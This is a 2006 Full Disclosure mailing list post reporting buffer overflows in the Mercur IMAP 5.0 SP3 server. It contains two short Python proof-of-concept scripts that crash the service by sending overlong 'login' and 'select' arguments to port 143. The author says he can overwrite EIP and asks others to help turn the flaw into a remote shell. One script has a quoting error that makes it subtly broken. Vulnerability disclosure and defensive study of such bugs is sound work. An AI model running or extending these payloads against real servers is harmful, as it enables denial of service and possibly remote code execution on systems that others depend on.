Full Disclosure mailing list archives
Mercur IMAPD 5.0 SP3 DoS Exploit or more?
From: "Tim Taylor" <Tim.Taylor () gmx ch>
Date: Thu, 16 Mar 2006 22:30:44 +0100 (MET)
Hi folks, I found this bugs in a imap-server called Mercur IMAP 5.0 SP3 from http://www.atrium-software.com/, but i was not able to exploit it successful for a remote shell on WinXP ServicePack2. The program has an intern check for the string length or something like that. I can overwrite the EIP successfully but can not put my shellcode behind the EIP. Because of this fact i have to write the shellcode in front of the EIP and this results in a 135 byte for the shellcode without the required "a login" or "a select". Perhaps someone has a clue and can solve this problems and teach me some lessons for the future. -- DoS Exploit -- # Atrium Mercur IMAP 5.0 SP3 DoS Exploit # pre authentifcation buffer overflow in imap command login import socket s=socket.socket() s.connect(("127.0.0.1", 143)) print s.recv(256) s.send("a001 login "\x41" * 275 + "\r\n") # buffer overflow in imap commands like select and others import socket s=socket.socket() s.connect(("127.0.0.1", 143)) print s.recv(256) s.send("a001 login test test\r\n") print s.recv(256) s.send("a002 select " + "\x41" * 239 + "\r\n") By the way at the first look it seems to be like some older bugs of this piece of software but I do not think so. Cheers Tim Taylor -- Bis zu 70% Ihrer Onlinekosten sparen: GMX SmartSurfer! Kostenlos downloaden: http://www.gmx.net/de/go/smartsurfer _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Mercur IMAPD 5.0 SP3 DoS Exploit or more? Tim Taylor (Mar 16)
- Re: Mercur IMAPD 5.0 SP3 DoS Exploit or more? 3APA3A (Mar 17)